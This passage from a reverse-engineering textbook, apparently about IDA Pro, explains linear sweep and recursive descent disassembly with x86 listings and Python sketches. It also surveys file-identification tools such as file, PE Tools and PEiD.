how the malware behaves. The two main techniques for malware analysis are

dynamic analysis and static analysis. Dynamic analysis involves allowing the

malware to execute in a carefully controlled environment (sandbox) while

recording every observable aspect of its behavior using any number of system

instrumentation utilities. In contrast, static analysis attempts to understand

the behavior of a program simply by reading through the program code,

which, in the case of malware, generally consists of a disassembly listing.

Vulnerability Analysis

For the sake of simplification, let’s break the entire security-auditing process

into three steps: vulnerability discovery, vulnerability analysis, and exploit

development. The same steps apply whether you have source code or not;

however, the level of effort increases substantially when all you have is a

binary. The first step in the process is to discover a potentially exploitable

condition in a program. This is often accomplished using dynamic techniques

such as fuzzing,[1] but it can also be performed (usually with much

more effort) via static analysis. Once a problem has been discovered, further

analysis is often required to determine whether the problem is exploitable at

all and, if so, under what conditions.

1. Fuzzing is a vulnerability-discovery technique that relies on generating large numbers of

unique inputs for programs in the hope that one of those inputs will cause the program to fail in

a manner that can be detected, analyzed, and ultimately exploited.

Disassembly listings provide the level of detail required to understand

exactly how the compiler has chosen to allocate program variables. For

example, it might be useful to know that a 70-byte character array declared

by a programmer was rounded up to 80 bytes when allocated by the compiler.

Disassembly listings also provide the only means to determine exactly how a

compiler has chosen to order all of the variables declared globally or within

functions. Understanding the spatial relationships among variables is often

essential when attempting to develop exploits. Ultimately, by using a

disassembler and a debugger together, an exploit may be developed.
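One plausible explanation for a 70-byte array occupying 80 bytes is alignment padding. The sketch below assumes a 16-byte alignment requirement, which is an illustrative choice and not something the text states; real compilers and calling conventions vary, which is exactly why the disassembly has to be consulted.

```python
def round_up(size: int, alignment: int) -> int:
    """Round size up to the next multiple of alignment (a power of two)."""
    if alignment <= 0 or alignment & (alignment - 1):
        raise ValueError("alignment must be a positive power of two")
    return (size + alignment - 1) & ~(alignment - 1)

# Assumed 16-byte alignment: a 70-byte buffer would occupy 80 bytes.
print(round_up(70, 16))
```

Under a 4-byte alignment assumption the same array would occupy 72 bytes instead, so the distance between the buffer and neighboring variables cannot be predicted from the source code alone.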

Software Interoperability

When software is released in binary form only, it is very difficult for com-

petitors to create software that can interoperate with it or to provide plug-in

replacements for that software. A common example is driver code released

for hardware that is supported on only one platform. When a vendor is

slow to support or, worse yet, refuses to support the use of its hardware with

alternative platforms, substantial reverse engineering effort may be required

in order to develop software drivers to support the hardware. In these cases,

static code analysis is almost the only remedy and often must go beyond the

software driver to understand embedded firmware.

Compiler Validation

Since the purpose of a compiler (or assembler) is to generate machine lan-

guage, good disassembly tools are often required to verify that the compiler is

doing its job in accordance with any design specifications. Analysts may also

be interested in locating additional opportunities for optimizing compiler

output and, from a security standpoint, ascertaining whether the compiler

itself has been compromised to the extent that it may be inserting back doors

into generated code.

Debugging Displays

Perhaps the single most common use of disassemblers is to generate listings

within debuggers. Unfortunately, disassemblers embedded within debuggers

tend to be fairly unsophisticated. They are generally incapable of batch disas-

sembly and sometimes balk at disassembling when they cannot determine

the boundaries of a function. This is one of the reasons why it is best to use a

debugger in conjunction with a high-quality disassembler to provide better

situational awareness and context during debugging.

The How of Disassembly

Now that you’re well versed in the purposes of disassembly, it’s time to move

on to how the process actually works. Consider a typical daunting task faced

by a disassembler: Take these 100KB, distinguish code from data, convert the code to

assembly language for display to a user, and please don’t miss anything along the way.

We could tack any number of special requests on the end of this, such as

asking the disassembler to locate functions, recognize jump tables, and identify

local variables, making the disassembler’s job that much more difficult.

In order to accommodate all of our demands, any disassembler will need

to pick and choose from a variety of algorithms as it navigates through the

files that we feed it. The quality of the generated disassembly listing will be

directly related to the quality of the algorithms utilized and how well they

have been implemented. In this section we will discuss two of the fundamental

algorithms in use today for disassembling machine code. As we present these

algorithms, we will also point out their shortcomings in order to prepare you

for situations in which your disassembler appears to fail. By understanding a

disassembler’s limitations, you will be able to manually intervene to improve

the overall quality of the disassembly output.

A Basic Disassembly Algorithm

For starters, let’s develop a simple algorithm for accepting machine language

as input and producing assembly language as output. In doing so, we will

gain an understanding of the challenges, assumptions, and compromises

that underlie an automated disassembly process.

Step 1

The first step in the disassembly process is to identify a region of code to

disassemble. This is not necessarily as straightforward as it may seem.

Instructions are generally mixed with data, and it is important to distin-

guish between the two. In the most common case, disassembly of an

executable file, the file will conform to a common format for executable

files such as the Portable Executable (PE) format used on Windows or the

Executable and Linking Format (ELF) common on many Unix-based systems.

These formats typically contain mechanisms (often in the form of hierar-

chical file headers) for locating the sections of the file that contain code

and entry points[2] into that code.

Step 2

Given an initial address of an instruction, the next step is to read the

value contained at that address (or file offset) and perform a table lookup

to match the binary opcode value to its assembly language mnemonic.

Depending on the complexity of the instruction set being disassembled,

this may be a trivial process, or it may involve several additional operations

such as understanding any prefixes that may modify the instruction’s

behavior and determining any operands required by the instruction. For

instruction sets with variable-length instructions, such as the Intel x86,

additional instruction bytes may need to be retrieved in order to com-

pletely disassemble a single instruction.

Step 3

Once an instruction has been fetched and any required operands

decoded, its assembly language equivalent is formatted and output as

part of the disassembly listing. It may be possible to choose from more

than one assembly language output syntax. For example, the two

predominant formats for x86 assembly language are the Intel format

and the AT&T format.

2. A program entry point is simply the address of the instruction to which the operating system

passes control once a program has been loaded into memory.

Step 4

Following the output of an instruction, we need to advance to the next

instruction and repeat the previous process until we have disassembled

every instruction in the file.

Various algorithms exist for determining where to begin a disassembly,

how to choose the next instruction to be disassembled, how to distinguish

code from data, and how to determine when the last instruction has been

disassembled. The two predominant disassembly algorithms are linear sweep

and recursive descent.
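Steps 2 and 3 above can be sketched in Python as follows. This is a toy decoder that covers only a handful of single-opcode x86 instructions; the function name `decode_one` and the choice of subset are assumptions for illustration, and a real decoder must also handle prefixes, ModR/M and SIB bytes, and many more opcodes.

```python
import struct

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

def decode_one(code: bytes, offset: int, base: int = 0):
    """Decode one instruction at offset; return (length, Intel-syntax text)."""
    op = code[offset]
    addr = base + offset
    if op == 0x90:
        return 1, "nop"
    if op == 0xC3:
        return 1, "ret"
    if 0x50 <= op <= 0x57:                    # register encoded in the opcode
        return 1, f"push {REG32[op - 0x50]}"
    if 0x58 <= op <= 0x5F:
        return 1, f"pop {REG32[op - 0x58]}"
    if 0xB8 <= op <= 0xBF:                    # opcode plus 32-bit immediate
        (imm,) = struct.unpack_from("<I", code, offset + 1)
        return 5, f"mov {REG32[op - 0xB8]}, 0x{imm:x}"
    if op == 0xEB:                            # opcode plus signed 8-bit offset
        (rel,) = struct.unpack_from("<b", code, offset + 1)
        return 2, f"jmp 0x{addr + 2 + rel:x}"
    return 1, f"db 0x{op:02x}"                # unknown byte: emit it as data

print(decode_one(bytes.fromhex("b878563412"), 0))
```

Note that the instruction length is a by-product of decoding: only after the opcode has been looked up does the decoder know how many additional bytes belong to the instruction.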

Linear Sweep Disassembly

The linear sweep disassembly algorithm takes a very straightforward approach

to locating instructions to disassemble: Where one instruction ends, another

begins. As a result, the most difficult decision faced is where to begin. The

usual solution is to assume that everything contained in sections of a program

marked as code (typically specified by the program file’s headers) represents

machine language instructions. Disassembly begins with the first byte in a

code section and moves, in a linear fashion, through the section, disassem-

bling one instruction after another until the end of the section is reached.

No effort is made to understand the program’s control flow through recogni-

tion of nonlinear instructions such as branches.

During the disassembly process, a pointer can be maintained to mark the

beginning of the instruction currently being disassembled. As part of the

disassembly process, the length of each instruction is computed and used to

determine the location of the next instruction to be disassembled. Instruction

sets with fixed-length instructions (MIPS, for example) are somewhat easier

to disassemble, as locating subsequent instructions is straightforward.
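The linear sweep loop itself is short. The sketch below uses a hypothetical mini-table that maps a few x86 opcodes to a mnemonic and a total length; the table, the function name `linear_sweep`, and the sample bytes are all assumptions chosen for illustration. The sample deliberately places four bytes of data after a short jump.

```python
# Hypothetical mini-table: opcode -> (mnemonic, total instruction length).
# Real x86 decoding also needs prefixes, ModR/M, and SIB handling.
OPCODES = {
    0x55: ("push ebp", 1),
    0x5D: ("pop ebp", 1),
    0x90: ("nop", 1),
    0xC3: ("ret", 1),
    0xB8: ("mov eax, imm32", 5),
    0xEB: ("jmp short rel8", 2),
}

def linear_sweep(code: bytes, base: int = 0):
    """Disassemble from the first byte to the last, one instruction after another."""
    listing = []
    offset = 0
    while offset < len(code):
        mnemonic, length = OPCODES.get(code[offset], ("db (unknown)", 1))
        raw = code[offset:offset + length]
        hex_bytes = " ".join(f"{b:02x}" for b in raw)
        listing.append((base + offset, hex_bytes, mnemonic))
        offset += length        # where one instruction ends, the next begins
    return listing

# push ebp; jmp over 4 data bytes (b8 11 22 33); pop ebp; ret
SAMPLE = bytes.fromhex("55 eb 04 b8 11 22 33 5d c3")

for address, hex_bytes, mnemonic in linear_sweep(SAMPLE):
    print(f"{address:04x}: {hex_bytes:<16} {mnemonic}")
```

Because the sweep ignores the jump, it decodes the data byte `b8` as the start of a 5-byte `mov`, which swallows the real `pop ebp` at offset 7. The resulting listing is complete in coverage but wrong in content.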

X86 ASSEMBLY SYNTAX: AT&T VS. INTEL

There are two main syntaxes used for x86 assembly source code: AT&T and Intel.

Even though both are second-generation languages, the two differ greatly, from

how variables, constants, and registers are accessed, to segment and instruction

size overrides, to indirection and offsets. The AT&T assembly syntax is distinguished by its use of

the % symbol to prefix all register names, the use of $ as a prefix for literal constants

(also called immediate operands), and its operand ordering in which the source

operand appears as the left-hand operand and the destination operand appears on

the right. Using AT&T syntax, the instruction to add four to the EAX register would

read: add $0x4,%eax. The GNU Assembler (Gas) and many other GNU tools, includ-

ing gcc and gdb, utilize AT&T syntax.

Intel syntax differs from AT&T in that it requires no register or literal prefixes

and the operand ordering is reversed such that the source operand appears on the

right and the destination appears on the left. The same add instruction using the Intel

syntax would read: add eax,0x4. Assemblers utilizing Intel syntax include the

Microsoft Assembler (MASM), Borland’s Turbo Assembler (TASM), and the Netwide

Assembler (NASM).
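The difference between the two syntaxes for the add example above can be sketched with two small formatting functions. The function names are hypothetical, and the sketch handles only the register-destination, immediate-source form used in the sidebar.

```python
def format_intel(mnemonic: str, dest_reg: str, imm: int) -> str:
    """Intel syntax: destination first, no prefixes on registers or literals."""
    return f"{mnemonic} {dest_reg},0x{imm:x}"

def format_att(mnemonic: str, dest_reg: str, imm: int) -> str:
    """AT&T syntax: source first, $ before literals, % before registers."""
    return f"{mnemonic} $0x{imm:x},%{dest_reg}"

print(format_intel("add", "eax", 4))
print(format_att("add", "eax", 4))
```

Both strings describe the same machine instruction; only the presentation differs.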

The main advantage of the linear sweep algorithm is that it provides

complete coverage of a program’s code sections. One of the primary disad-

vantages of the linear sweep method is that it fails to account for the fact that

data may be comingled with code. This is evident in Listing 1-1, which shows

the output of a function disassembled with a linear sweep disassembler. This

function contains a switch statement, and the compiler used in this case

has elected to implement the switch using a jump table. Furthermore, the

compiler has elected to embed the jump table within the function itself. The

jmp statement at X, 401250, references an address table starting at Y, 401257.

Unfortunately, the disassembler treats Y as if it were an instruction and

incorrectly generates the corresponding assembly language representation:

   40123f:  55                     push   ebp
   401240:  8b ec                  mov    ebp,esp
   401242:  33 c0                  xor    eax,eax
   401244:  8b 55 08               mov    edx,DWORD PTR [ebp+8]
   401247:  83 fa 0c               cmp    edx,0xc
   40124a:  0f 87 90 00 00 00      ja     0x4012e0
X  401250:  ff 24 95 57 12 40 00   jmp    DWORD PTR [edx*4+0x401257]
Y  401257:  e0 12                  loopne 0x40126b
   401259:  40                     inc    eax
   40125a:  00 8b 12 40 00 90      add    BYTE PTR [ebx-0x6fffbfee],cl
   401260:  12 40 00               adc    al,BYTE PTR [eax]
   401263:  95                     xchg   ebp,eax
   401264:  12 40 00               adc    al,BYTE PTR [eax]
   401267:  9a 12 40 00 a2 12 40   call   0x4012:0xa2004012
   40126e:  00 aa 12 40 00 b2      add    BYTE PTR [edx-0x4dffbfee],ch
   401274:  12 40 00               adc    al,BYTE PTR [eax]
   401277:  ba 12 40 00 c2         mov    edx,0xc2004012
   40127c:  12 40 00               adc    al,BYTE PTR [eax]
   40127f:  ca 12 40               lret   0x4012
   401282:  00 d2                  add    dl,dl
   401284:  12 40 00               adc    al,BYTE PTR [eax]
   401287:  da 12                  ficom  DWORD PTR [edx]
   401289:  40                     inc    eax
   40128a:  00 8b 45 0c eb 50      add    BYTE PTR [ebx+0x50eb0c45],cl
   401290:  8b 45 10               mov    eax,DWORD PTR [ebp+16]
   401293:  eb 4b                  jmp    0x4012e0

Listing 1-1: Linear sweep disassembly

If we examine successive 4-byte groups as little-endian[3] values beginning at

Y, we see that each represents a pointer to a nearby address that is in fact the

destination for one of various jumps (004012e0, 0040128b, 00401290, . . .). Thus,

the loopne instruction at Y is not an instruction at all. Instead, it indicates a

failure of the linear sweep algorithm to properly distinguish embedded

data from code.
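The reinterpretation described above can be reproduced with a few lines of Python. The byte string is copied from the hex column of Listing 1-1, starting at address 401257; the function name `read_jump_table` is an assumption, and the entry count of 13 follows from the `cmp edx,0xc` bounds check (cases 0 through 12).

```python
import struct

# Bytes from Listing 1-1, beginning at address 0x401257.
TABLE_BYTES = bytes.fromhex(
    "e0124000 8b124000 90124000 95124000 9a124000 a2124000 aa124000 "
    "b2124000 ba124000 c2124000 ca124000 d2124000 da124000"
)

def read_jump_table(data: bytes, count: int):
    """Interpret data as count consecutive little-endian 32-bit pointers."""
    return list(struct.unpack_from(f"<{count}I", data, 0))

targets = read_jump_table(TABLE_BYTES, 13)
for case, target in enumerate(targets):
    print(f"case {case:2d} -> {target:08x}")
```

Read this way, the 52 bytes end exactly at 40128b, which is also the second entry in the table: the first real instruction after the embedded data.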

Linear sweep is used by the disassembly engines contained in the GNU

debugger (gdb), Microsoft’s WinDbg debugger, and the objdump utility.

3. A CPU is described as either big-endian or little-endian depending on whether the CPU saves

the most significant byte of a multibyte value first (big-endian) or whether it stores the least

significant byte first (little-endian).

Recursive Descent Disassembly

Recursive descent takes a different approach to locating instructions. Recur-

sive descent focuses on the concept of control flow, which determines whether

an instruction should be disassembled or not based on whether it is referenced

by another instruction. To understand recursive descent, it is helpful to clas-

sify instructions according to how they affect the CPU instruction pointer.

Sequential Flow Instructions

Sequential flow instructions pass execution to the instruction that immediately

follows. Examples of sequential flow instructions include simple arithmetic

instructions, such as add; register-to-memory transfer instructions, such as mov;

and stack-manipulation operations, such as push and pop. For such instructions,

disassembly proceeds as with linear sweep.

Conditional Branching Instructions

Conditional branching instructions, such as the x86 jnz, offer two possible

execution paths. If the condition evaluates to true, the branch is taken, and

the instruction pointer must be changed to reflect the target of the branch.

However, if the condition is false, execution continues in a linear fashion,

and a linear sweep methodology can be used to disassemble the next instruc-

tion. As it is generally not possible in a static context to determine the out-

come of a conditional test, the recursive descent algorithm disassembles both

paths, deferring disassembly of the branch target instruction by adding the

address of the target instruction to a list of addresses to be disassembled at a

later point.

Unconditional Branching Instructions

Unconditional branches do not follow the linear flow model and therefore are

handled differently by the recursive descent algorithm. As with the sequential

flow instructions, execution can flow to only one instruction; however, that

instruction need not immediately follow the branch instruction. In fact,

as seen in Listing 1-1, there is no requirement at all for an instruction to

immediately follow an unconditional branch. Therefore, there is no reason

to disassemble the bytes that follow an unconditional branch.

A recursive descent disassembler will attempt to determine the target

of the unconditional jump and add the destination address to the list of

addresses that have yet to be explored. Unfortunately, some unconditional

branches can cause problems for recursive descent disassemblers. When the

target of a jump instruction depends on a runtime value, it may not be possi-

ble to determine the destination of the jump using static analysis. The x86

instruction jmp eax demonstrates this problem. The eax register contains a

value only when the program is actually running. Since the register contains

no value during static analysis, we have no way to determine the target of the

jump instruction, and consequently, we have no way to determine where to

continue the disassembly process.

Function Call Instructions

Function call instructions operate in a manner very similar to unconditional

jump instructions (including the inability of the disassembler to determine the

target of instructions such as call eax), with the additional expectation that

execution usually returns to the instruction immediately following the call

instruction once the function completes. In this regard, they are similar to

conditional branch instructions in that they generate two execution paths.

The target address of the call instruction is added to a list for deferred disas-

sembly, while the instruction immediately following the call is disassembled in

a manner similar to linear sweep.

Recursive descent can fail if programs do not behave as expected when

returning from called functions. For example, code in a function can delib-

erately manipulate the return address of that function so that upon comple-

tion, control returns to a location different from the one expected by the

disassembler. A simple example is shown in the following incorrect listing,

where function foo simply adds 1 to the return address before returning to

the caller.

   foo proc near
   FF 04 24          inc   dword ptr [esp]   ; increments saved return addr
   C3                retn
   foo endp
   ; -------------------------------------
   bar:
   E8 F7 FF FF FF    call  foo
X  05 89 45 F8 90    add   eax, 90F84589h

As a result, control does not actually pass to the add instruction at X fol-

lowing the call to foo. A proper disassembly appears below:

   foo proc near
   FF 04 24          inc   dword ptr [esp]
   C3                retn
   foo endp
   ; -------------------------------------
   bar:
   E8 F7 FF FF FF    call  foo
   05                db    5                 ; formerly the first byte of the add instruction
Y  89 45 F8          mov   [ebp-8], eax
   90                nop

This listing more clearly shows the actual flow of the program in which

function foo actually returns to the mov instruction at Y. It is important to

understand that a linear sweep disassembler will also fail to properly dis-

assemble this code, though for slightly different reasons.
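The arithmetic behind this example can be traced in a short Python sketch. The bytes come from the listings above; the offsets `FOO = 0` and `BAR = 4` assume that foo is laid out immediately before bar, which is consistent with the call displacement but is not stated explicitly in the text. The function name `trace_call` is likewise hypothetical.

```python
import struct

# foo (4 bytes), then bar's call (5 bytes), then the 5 bytes that follow it.
CODE = bytes.fromhex("ff0424c3" "e8f7ffffff" "058945f890")
FOO = 0   # assumed offset of foo within CODE
BAR = 4   # assumed offset of the call instruction in bar

def trace_call(code: bytes, call_offset: int, adjust: int):
    """Return (call target, bytes skipped on return, offset where execution resumes)."""
    (rel32,) = struct.unpack_from("<i", code, call_offset + 1)
    pushed_return = call_offset + 5      # address of the byte after the call
    target = pushed_return + rel32       # E8 displacement is relative to that address
    resume = pushed_return + adjust      # the callee changed its saved return address
    return target, code[pushed_return:resume], resume

target, skipped, resume = trace_call(CODE, BAR, adjust=1)
print(f"call target: {target:#x}, skipped: {skipped.hex()}, resumes at: {resume:#x}")
```

A disassembler that assumes execution resumes at the pushed return address starts decoding at the 05 byte; the program actually resumes one byte later, at 89 45 F8.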

Return Instructions

In some cases, the recursive descent algorithm runs out of paths to follow.

A function return instruction (x86 ret, for example) offers no information

about what instruction will be executed next. If the program were actually

running, an address would be taken from the top of the runtime stack, and

execution would resume at that address. Disassemblers do not have the

benefit of access to a stack. Instead, disassembly abruptly comes to a halt. It

is at this point that the recursive descent disassembler turns to the list of

addresses it has been setting aside for deferred disassembly. An address is

removed from this list, and the disassembly process is continued from this

address. This is the recursive process that lends the disassembly algorithm

its name.
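The instruction classes described in this section map directly onto a worklist loop. The sketch below is a simplified model, not IDA's implementation: instructions are assumed to be already decoded into a hypothetical table of (text, length, kind, target) tuples so that the control flow logic stands out. The addresses and the `PROGRAM` table are invented for illustration.

```python
from collections import deque

# Hypothetical pre-decoded program: address -> (text, length, kind, target).
# kind is one of "seq", "cond", "jump", "call", "ret"; target is None when it
# cannot be determined statically (for example, jmp eax).
PROGRAM = {
    0x00: ("push ebp",  1, "seq",  None),
    0x01: ("call 0x20", 5, "call", 0x20),
    0x06: ("jnz 0x0a",  2, "cond", 0x0A),
    0x08: ("jmp 0x0b",  2, "jump", 0x0B),
    0x0A: ("nop",       1, "seq",  None),
    0x0B: ("ret",       1, "ret",  None),
    0x20: ("ret",       1, "ret",  None),
}

def recursive_descent(program, entry):
    """Return addresses in the order they are disassembled, following control flow."""
    visited = []
    seen = set()
    worklist = deque([entry])        # addresses deferred for later disassembly
    while worklist:
        addr = worklist.popleft()
        # Follow one path until it ends or rejoins code that is already known.
        while addr in program and addr not in seen:
            text, length, kind, target = program[addr]
            seen.add(addr)
            visited.append(addr)
            if kind in ("cond", "call", "jump") and target is not None:
                worklist.append(target)
            if kind in ("jump", "ret"):
                break                # nothing is assumed to follow these
            addr += length           # seq, cond, call: continue linearly
    return visited

print([hex(a) for a in recursive_descent(PROGRAM, 0x00)])
```

Addresses 0x0C through 0x1F are never referenced by any instruction, so they are never decoded; if they held a jump table, it would be left alone. The same property is the algorithm's weakness: code reachable only through an unresolved target is never visited either.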

One of the principal advantages of the recursive descent algorithm is

its superior ability to distinguish code from data. As a control flow–based

algorithm, it is much less likely to incorrectly disassemble data values as

code. The main disadvantage of recursive descent is the inability to follow

indirect code paths, such as jumps or calls, which utilize tables of pointers to

look up a target address. However, with the addition of some heuristics to

identify pointers to code, recursive descent disassemblers can provide very

complete code coverage and excellent recognition of code versus data. List-

ing 1-2 shows the output of a recursive descent disassembler used on the

same switch statement shown earlier in Listing 1-1.

0040123F    push  ebp
00401240    mov   ebp, esp
00401242    xor   eax, eax
00401244    mov   edx, [ebp+arg_0]
00401247    cmp   edx, 0Ch                 ; switch 13 cases
0040124A    ja    loc_4012E0               ; default
0040124A                                   ; jumptable 00401250 case 0
00401250    jmp   ds:off_401257[edx*4]     ; switch jump
00401250 ; ---------------------------------------------------
00401257 off_401257:
00401257    dd offset loc_4012E0           ; DATA XREF: sub_40123F+11r
00401257    dd offset loc_40128B           ; jump table for switch statement
00401257    dd offset loc_401290
00401257    dd offset loc_401295
00401257    dd offset loc_40129A
00401257    dd offset loc_4012A2
00401257    dd offset loc_4012AA
00401257    dd offset loc_4012B2
00401257    dd offset loc_4012BA
00401257    dd offset loc_4012C2
00401257    dd offset loc_4012CA
00401257    dd offset loc_4012D2
00401257    dd offset loc_4012DA
0040128B ; ---------------------------------------------------
0040128B
0040128B loc_40128B:                       ; CODE XREF: sub_40123F+11j
0040128B                                   ; DATA XREF: sub_40123F:off_401257o
0040128B    mov   eax, [ebp+arg_4]         ; jumptable 00401250 case 1
0040128E    jmp   short loc_4012E0         ; default
0040128E                                   ; jumptable 00401250 case 0

Listing 1-2: Recursive descent disassembly

Note that the table of jump destinations has been recognized and for-

matted accordingly. IDA Pro is the most prominent example of a recursive

descent disassembler. An understanding of the recursive descent process will

help us recognize situations in which IDA may produce less than optimal dis-

assemblies and allow us to develop strategies to improve IDA’s output.

Summary

Is deep understanding of disassembly algorithms essential when using a

disassembler? No. Is it useful? Yes! Battling your tools is the last thing you

want to spend time doing while reverse engineering. One of the many advan-

tages of IDA is that, unlike most other disassemblers, it offers you plenty of

opportunity to guide and override its decisions. The net result is that the fin-

ished product, an accurate disassembly, will be far superior to anything else

available.

In the next chapter we will review a variety of existing tools that prove

useful in many reverse engineering situations. While not directly related to

IDA, many of these tools have influenced and been influenced by IDA, and

they help to explain the wide variety of informational displays available in the

IDA user interface.

REVERSING AND DISASSEMBLY TOOLS

With some disassembly background under

our belts, and before we begin our dive into

the specifics of IDA Pro, it will be useful to

understand some of the other tools that are

used for reverse engineering binaries. Many of these

tools predate IDA and continue to be useful for quick

glimpses into files as well as for double-checking the work that IDA does.

As we will see, IDA rolls many of the capabilities of these tools into its user

interface to provide a single, integrated environment for reverse engineering.

Finally, although IDA does contain an integrated debugger, we will not cover

debuggers here as Chapters 24, 25, and 26 are dedicated to the topic.

16 Chapter 2

Classification Tools

When first confronted with an unknown file, it is often useful to answer

simple questions such as “What is this thing?” The first rule of thumb when

attempting to answer that question is to never rely on a filename extension to

determine what a file actually is. That is also the second, third, and fourth

rules of thumb. Once you have become an adherent of the file extensions are

meaningless line of thinking, you may wish to familiarize yourself with one or

more of the following utilities.

file

The file command is a standard utility, included with most *NIX-style

operating systems and with the Cygwin[1] or MinGW[2] tools for Windows. The file utility

attempts to identify a file’s type by examining specific fields within the file. In

some cases file recognizes common strings such as #!/bin/sh (a shell script)

or <html> (an HTML document). Files containing non-ASCII content present

somewhat more of a challenge. In such cases, file attempts to determine

whether the content appears to be structured according to a known file for-

mat. In many cases it searches for specific tag values (often referred to as

magic numbers[3]) known to be unique to specific file types. The hex listings

below show several examples of magic numbers used to identify some com-

mon file types.

Windows PE executable file

00000000  4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00  MZ..............
00000010  B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  ........@.......

JPEG image file

00000000  FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 60  ......JFIF.....`
00000010  00 60 00 00 FF DB 00 43 00 0A 07 07 08 07 06 0A  .`.....C........

Java .class file

00000000  CA FE BA BE 00 00 00 32 00 98 0A 00 2E 00 3E 08  .......2......>.
00000010  00 3F 09 00 40 00 41 08 00 42 0A 00 43 00 44 0A  .?..@.A..B..C.D.

file has the capability to identify a large number of file formats, including

several types of ASCII text files and various executable and data file formats.

The magic number checks performed by file are governed by rules contained

in a magic file. The default magic file varies by operating system, but common

locations include /usr/share/file/magic, /usr/share/misc/magic, and /etc/magic.

Please refer to the documentation for file for more information concerning

magic files.
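A magic number check of the kind described above can be sketched in a few lines of Python. This is a drastically simplified stand-in for the rules in a real magic file: the table, the descriptions, and the function name `identify` are assumptions, and the signatures are limited to the ones shown in the hex listings plus the well-known ELF and shell-script markers.

```python
# Hypothetical signature table: (leading bytes, description).
MAGIC = [
    (b"\x7fELF", "ELF executable or object file"),
    (b"\xca\xfe\xba\xbe", "Java .class file"),
    (b"\xff\xd8\xff", "JPEG image"),
    (b"MZ", "MS-DOS/Windows executable"),
    (b"#!", "script with interpreter line"),
]

def identify(data: bytes) -> str:
    """Return a description based only on the first few bytes of data."""
    for magic, description in MAGIC:
        if data.startswith(magic):
            return description
    return "data"

print(identify(bytes.fromhex("4d5a9000030000000400")))
print(identify(bytes.fromhex("cafebabe00000032")))
```

Because the decision rests on a few leading bytes, any content that happens to begin with a known signature is classified accordingly, whether or not the rest of the file conforms to that format.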

1. See http://www.cygwin.com/.

2. See http://www.mingw.org/.

3. A magic number is a special tag value required by some file format specifications whose presence

indicates conformance to such specifications. In some cases humorous reasons surround the

selection of magic numbers. The MZ tag in MS-DOS executable file headers represents the initials

of Mark Zbikowski, one of the original architects of MS-DOS, while the hex value 0xcafebabe,

the well-known magic number associated with Java .class files, was chosen because it is an easily

remembered sequence of hex digits.

In some cases, file can distinguish variations within a given file type.

The following listing demonstrates file’s ability to identify not only several

variations of ELF binaries but also information pertaining to how the binary

was linked (statically or dynamically) and whether the binary was stripped

or not.

idabook# file ch2_ex_*
ch2_ex.exe:                  MS-DOS executable PE for MS Windows (console)
                             Intel 80386 32-bit
ch2_ex_upx.exe:              MS-DOS executable PE for MS Windows (console)
                             Intel 80386 32-bit, UPX compressed
ch2_ex_freebsd:              ELF 32-bit LSB executable, Intel 80386,
                             version 1 (FreeBSD), for FreeBSD 5.4,
                             dynamically linked (uses shared libs),
                             FreeBSD-style, not stripped
ch2_ex_freebsd_static:       ELF 32-bit LSB executable, Intel 80386,
                             version 1 (FreeBSD), for FreeBSD 5.4,
                             statically linked, FreeBSD-style, not stripped
ch2_ex_freebsd_static_strip: ELF 32-bit LSB executable, Intel 80386,
                             version 1 (FreeBSD), for FreeBSD 5.4,
                             statically linked, FreeBSD-style, stripped
ch2_ex_linux:                ELF 32-bit LSB executable, Intel 80386,
                             version 1 (SYSV), for GNU/Linux 2.6.9,
                             dynamically linked (uses shared libs),
                             not stripped
ch2_ex_linux_static:         ELF 32-bit LSB executable, Intel 80386,
                             version 1 (SYSV), for GNU/Linux 2.6.9,
                             statically linked, not stripped
ch2_ex_linux_static_strip:   ELF 32-bit LSB executable, Intel 80386,
                             version 1 (SYSV), for GNU/Linux 2.6.9,
                             statically linked, stripped
ch2_ex_linux_stripped:       ELF 32-bit LSB executable, Intel 80386,
                             version 1 (SYSV), for GNU/Linux 2.6.9,
                             dynamically linked (uses shared libs), stripped

THE CYGWIN ENVIRONMENT

Cygwin is a set of utilities for the Windows operating system that provides a Linux-style

command shell and associated programs. During installation, users can choose from a

large number of standard packages, including compilers (gcc, g++), interpreters

(Perl, Python, Ruby), networking utilities (nc, ssh), and many others. Once Cygwin

has been installed, many programs written for use with Linux can be compiled and

executed on Windows systems.

file and similar utilities are not foolproof. It is quite possible for a file to

be misidentified simply because it happens to bear the identifying marks of

some file format. You can see this for yourself by using a hex editor to modify

the first four bytes of any file to the Java magic number sequence: CA FE BA BE.

The file utility will incorrectly identify the newly modified file as compiled

Java class data. Similarly, a text file containing only the two characters MZ will

be identified as an MS-DOS executable. A good approach to take in any reverse

engineering effort is to never fully trust the output of any tool until you have

correlated that output with several tools and manual analysis.

PE Tools

PE Tools[4] is a collection of tools useful for analyzing both running processes

and executable files on Windows systems. Figure 2-1 shows the primary

interface offered by PE Tools, which displays a list of active processes and

provides access to all of the PE Tools utilities.

Figure 2-1: The PE Tools utility

4. See http://petools.org.ru/petools.shtml.

STRIPPING BINARY EXECUTABLE FILES

Stripping a binary is the process of removing symbols from the binary file. Binary

object files contain symbols as a result of the compilation process. Some of these

symbols are utilized during the linking process to resolve references between files

when creating the final executable file or library. In other cases, symbols may be

present to provide additional information for use with debuggers. Following the

linking process, many of the symbols are no longer required. Options passed to

the linker can cause the linker to remove the unnecessary symbols at build time.

Alternatively, a utility named strip may be used to remove symbols from existing

binary files. While a stripped binary will be smaller than its unstripped counterpart,

the behavior of the stripped binary will remain unchanged.

From the process list, users can dump a process’s memory image to a file

or utilize the PE Sniffer utility to determine what compiler was used to build

the executable or whether the executable was processed by any known

obfuscation utilities. The Tools menu offers similar options for analysis of

disk files. Users can view a file’s PE header fields by using the embedded PE

Editor utility, which also allows for easy modification of any header values.

Modification of PE headers is often required when attempting to reconstruct

a valid PE from an obfuscated version of that file.

PEiD

PEiD[5] is another Windows tool whose primary purposes are to identify the

compiler used to build a particular Windows PE binary and to identify any

tools used to obfuscate a Windows PE binary. Figure 2-2 shows the use of

PEiD to identify the tool (ASPack in this case) used to obfuscate a variant of

the Gaobot6 worm.

Figure 2-2: The PEiD utility

5. See http://peid.info/.

6. See http://securityresponse.symantec.com/security_response/writeup.jsp?docid=2003-112112-1102-99.

BINARY FILE OBFUSCATION

Obfuscation is any attempt to obscure the true meaning of something. When applied

to executable files, obfuscation is any attempt to hide the true behavior of a program.

Programmers may employ obfuscation for a number of reasons. Commonly cited

examples include protecting proprietary algorithms and obscuring malicious intent.

